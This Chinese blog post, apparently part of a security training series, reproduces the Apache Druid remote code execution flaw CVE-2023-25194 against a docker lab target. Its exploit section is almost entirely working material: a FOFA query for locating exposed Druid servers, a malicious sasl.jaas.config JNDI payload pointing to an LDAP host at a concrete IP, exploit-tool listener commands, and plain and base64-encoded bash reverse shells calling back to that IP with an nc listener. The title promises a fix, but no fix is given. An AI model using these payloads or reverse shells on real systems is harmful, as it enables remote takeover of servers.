阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​

已于 2024-05-24 15:07:55 修改
阅读量676 收藏 18
点赞数 17
文章标签: web安全 安全 网络
于 2024-05-24 11:12:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/139167915
版权
Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​
Apache Druid RCE漏洞复现及修复(CVE-2023-
25194)
产品简介
Apache Druid是⼀个⾼性能的实时⼤数据分析引擎,⽀持快速数据摄取、实时查询和数据可视化。它主
要⽤于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有⾼度可扩展、低延迟和⾼吞吐量
的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。通过使⽤Druid,企业
和开发者可以快速获得实时分析结果,提升决策效率。
漏洞简介
在Apache Druid使⽤ Apache Kafka 加载数据的场景下, 未经身份认证的远程攻击者 可配置 Kafka 连接属
性,从⽽利⽤CVE-2023-25194漏洞 触发JNDI注⼊ ,最终 执⾏任意代码
(其他使⽤Apache Kafka Connect的产品也可能受CVE-2023-25194漏洞影响)
Apache Druid 是⼀个开源的分布式数据存储和分析系统。它设计⽤于处理⼤规模的实时数据,并提供快
速的交互式查询和分析。Apache Druid 使⽤了存在漏洞的 Kafka Connect,攻击者可访问Kafka
Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为恶意类,进⽽可导致
JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个
web服务器。
FOFA查询语句(点击直接查看结果):
app=“APACHE-Druid”
fofa常⽤语法+新功能-⽹络空间测绘
https://www.freebuf.com/sectool/268246.html
Kafka:
Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、
可扩展性等特点。它被⼴泛应⽤于⼤数据领域,如⽇志收集、数据传输、流处理等场景。
感觉上和 RocketMQ 很类似,主要功能都是⽤来进⾏数据传输的。
漏洞复现
使⽤⼯具:
burp:抓包
java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell
java -jar JNDIExploit-1.4-SNAPSHOT.jar:监听
操作步骤:
1、抓包,并修改payload
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击
要执⾏的命令touch /tmp/lm_hackerbase64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=
构造payload:ldap://vps ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9sbV9oYWNrZXI=
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required
user.provider.url=\"ldap://218.244.159.113:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9sbV9
oYWNrZXI=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\"
group.provider.url=\"xxx\";"},
1.开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 218.244.159.113
发送数据包,回到靶机,进⼊漏洞⽬录下 docker-compose exec web bash
可以看到lm_hacker⽂件被成功创建
参考如下:
https://blog.csdn.net/qq_53003652/article/details/131721688?
spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-
2%7Edefault%7ECTRLIST%7ERate-1-131721688-blog-
128964828.235%5Ev43%5Epc_blog_bottom_relevance_base4&depth_1-
utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-
131721688-blog-
128964828.235%5Ev43%5Epc_blog_bottom_relevance_base4&utm_relevant_index=2
bash -i >& /dev/tcp/218.244.159.113/9999 0>&1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTguMjQ0LjE1OS4xMTMvOTk5OSAwPiYx}|{base64,-d}|
{bash,-i}" -A 218.244.159.113
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTguMjQ0LjE1OS4xMTMvNjY2NiAwPiYx}|{base64,-d}|
{bash,-i}" -A 218.244.159.113
nc -lvp 9999
https://www.cnblogs.com/xiaoyunxiaogang/p/17469403.html
网安大队长阿一
关注
  • 17
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
【Microsoft Message Queuing远程代码执行漏洞CVE-2023-21554)漏洞修复
一纸荒芜的博客
06-12 9240
nessus漏扫的漏洞修复
探索CVE-2023-21554漏洞 PoC:技术解析与应用
gitblog_00081的博客
04-22 506
探索CVE-2023-21554漏洞 PoC:技术解析与应用 项目地址:https://gitcode.com/zoemurmure/CVE-2023-21554-PoC 在信息安全领域,了解并应对最新的安全漏洞至关重要。 CVE-2023-21554 是一个近期发现的安全漏洞,而GitCode上的 Zoemurmure 开发者分享了关于此漏洞的Proof-of-Concept(PoC)代码。本...
CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
cc123489ll的博客
05-31 757
CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件(.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
Windows Server 2012 R2服务器Microsoft 消息队列远程代码执行漏洞CVE-2023-21554补丁KB5025288的安装及问题解决
forestqq的博客
07-28 3772
近日,系统安全扫描中发现Windows Server 2012 R2服务器存在Microsoft 消息队列远程代码执行漏洞。本文记录补丁安装中遇到的“此更新不适用于你的计算机”问题及解决办法。
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
专题课件完美版(2021-2022年)南昌赣江新地项目品牌推广策略案76PPT九机构.ppt
10-01
此外,高端定位的四星酒店——香港怡和假日酒店,以及阿一鲍鱼、芭蕉叶餐厅等知名品牌的入驻,为项目带来了高人气和良好的口碑。 然而,赣江新地的目标并不仅仅是一次性的吸引力,而是寻求长期的经营与品牌忠诚度...
最新-英语国际音标表(48个)word版-绝对准确!-最新音标表.doc
10-06
- `/aɪ/` “阿一”:由[a]和[i]组成,发音时口型由开到合。 - `/eɪ/` “艾一”:由[e]和[i]组成,[e]重读,[i]轻读,口型由半开到合。 - `/ɔɪ/` “奥一”:由[כ]和[i]组成,前重读后轻读,双唇由圆到扁。 -...
南昌赣江新地项目品牌推广策略案_76PPT_九机构.pptx
10-13
阿一鲍鱼、芭蕉叶餐厅等知名品牌商家的入驻进一步增强了项目的人气。 然而,影响力并不等于品牌力。在产品同质化严重且易被复制的今,单靠影响力无法保证长期的成功。因此,九机构提出了"3力定市场"的观点,即...
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 483
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
探索CVE-2023-36874:Windows Error Reporting LPE漏洞利用工具
最新发布
gitblog_00044的博客
06-01 493
探索CVE-2023-36874:Windows Error Reporting LPE漏洞利用工具 项目地址:https://gitcode.com/Octoberfest7/CVE-2023-36874_BOF 项目简介 在网络安全世界中,CVE-2023-36874是一个引人关注的漏洞,它影响了多个版本的Windows操作系统。这个开源项目提供了一个功能完备的CobaltStrike Bea...
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略
gitblog_00037的博客
05-25 565
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略 项目地址:https://gitcode.com/alt3kx/CVE-2023-24055_PoC 一、项目介绍 随着密码管理的重要性日益凸显,KeePass因其可靠性和开源性质而备受推崇。然而,最近披露的CVE-2023-24055暴露了其2.5x版本的一个重大安全问题:恶意攻击者能够通过修改配置文件触发数据...
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9(1),2024年最新网络安全面试基础知识
芯_v_648374雨馨博客
04-18 473
检查相应配置文件后,还原备份文件(可选)
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7784
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-46604复现学习
shierbai的博客
05-19 662
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探索Confluence安全漏洞利用:ConfluenceMemshell详解
gitblog_00017的博客
05-31 628
探索Confluence安全漏洞利用:ConfluenceMemshell详解 项目地址:https://gitcode.com/Lotus6/ConfluenceMemshell 1、项目介绍 ConfluenceMemshell 是一个针对Confluence服务器的漏洞利用工具,设计用于利用CVE-2021-26084、CVE-2022-26134以及最新的CVE-2023系列漏洞。这个开源...
python 字符串转时间
07-28
可以使用`datetime`模块来将字符串转换为时间。以下是一个示例代码: ```python from datetime import datetime # 字符串时间 str_time = '2021-10-01 10:30:00' # 字符串转时间 time_obj = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S') print(time_obj) ``` 在上面的代码中,`strptime()`函数将字符串时间按照指定的格式解析为一个时间对象。`%Y`表示四位数的年份,`%m`表示两位数的月份,`%d`表示两位数的日期,`%H`表示24小时制的小时数,`%M`表示分钟数,`%S`表示秒数。 输出结果将会是一个时间对象,你可以根据需要进一步操作、格式化或比较时间。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值